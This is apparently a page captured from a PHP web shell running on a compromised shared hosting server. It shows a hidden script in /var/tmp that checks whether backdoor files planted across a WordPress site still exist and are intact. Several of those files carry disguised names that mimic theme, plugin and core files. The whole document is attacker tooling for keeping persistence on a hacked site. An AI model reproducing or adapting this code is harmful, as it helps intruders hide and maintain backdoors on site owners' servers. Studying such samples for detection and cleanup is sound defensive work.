HEX
Server: Apache
System: Linux pdx1-shared-a2-01 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: dh_mhscom (5469217)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: //var/tmp/.content
<?php   $r = '/home/siissa/siissadelsureste.com'; $x = ["/1557cb.php"=>"bd@@18259@@105",
"/wp-content/themes/home-1748027028/4O4.php"=>"bd@@262245@@727",
"/wp-content/plugins/gallery_1748009614/sldebar.php"=>"bd@@246650@@727",
"/45a869.php"=>"bd@@29656@@226",
"/wp-content/themes/Divi/includes/builder/plugin-compat/table-of-contents-plus.php"=>"bd@@378082@@Feature-Policy",
"/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@47397@@Large-Allocation"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');